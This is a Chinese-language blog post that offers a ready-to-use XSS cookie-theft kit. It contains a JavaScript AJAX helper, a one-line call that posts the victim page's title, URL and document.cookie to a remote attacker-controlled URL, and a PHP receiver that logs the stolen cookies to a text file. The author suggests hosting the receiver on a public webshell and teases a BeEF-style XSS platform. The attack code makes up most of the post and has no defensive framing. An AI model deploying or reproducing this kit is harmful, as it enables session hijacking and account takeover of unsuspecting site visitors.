一个简单的ajax获取远程cookie js脚本 加 php服务端
前言
e 这个真的挺简单的 就是一个ajax 发送到服务端 ,本文仅是简单脚本,可以随意挂在 如webshell的公网web ,各位同仁可以改为 mysql 数据驱动,加唯一验证什么的,最近勃主正在搞一个像 beef xssf一样的 xss 平台,自带各种payload 和执行自定义脚本,敬请期待吧.
兼容ajax
好像是从jquery 库里面截取出来的 调用和jquery 相似
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51
| x = window.x || { request: function() { if (window.XMLHttpRequest) { var ajax = new XMLHttpRequest() } else if (window.ActiveXObject) { try { var ajax = new ActiveXObject("Msxml2.XMLHTTP") } catch(e) { try { var ajax = new ActiveXObject("Microsoft.XMLHTTP") } catch(e) {} } } return ajax }, handle: function(ajax, callback) { ajax.onreadystatechange = function() { if (ajax.readyState == 4) { if (ajax.status == 200) { if (callback) allback(ajax.responseText) } } } }, display: function(o) { if (typeof(o) == 'object') { var str = ''; for (a in o) { str += a + '=' + o[a] + '&' } str = str.substr(0, str.length - 1); return str } else { return o } }, get: function(url, callback) { ajax = x.request(); ajax.open('get', url, true); ajax.send(null); x.handle(ajax, callback) }, post: function(url, content, callback) { ajax = x.request(); ajax.open('post', url, true); ajax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); content = x.display(content); ajax.send(content); x.handle(ajax, callback) } }
|
使用时可以 eval压缩一下 体积就小很多了 使用 ajax post
1
| x.post(xingUrl,{title:escape(document.title),url:escape(document.URL),cookie:document.cookie});
|
xingUrl 为远程服务端 这样就可以异步把 网页url title cookie 发送出去鸟
服务端编写
一个最为简单是演示
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
|
$a=$_GET['a']; $data="data.txt";
if($a=='xss'){
extract($_POST,EXTR_SKIP); if(!file_exists($data)) file_put_contents($data,""); $content="Time :".time()." | Url :".$url." | Cookie :".$cookie; file_put_contents($data, $content,FILE_APPEND);
}
|
demo 下载
好吧 简单脚本已经实现鸟 勃主几个小时之后还得赶回来家的早车 睡觉鸟 不懂的可以加我q(本博客右边) 猛点击我下载
更新 xss.js 中的 xingUrl 即可
演示
打开 demo中的 test.html look 下面内涵图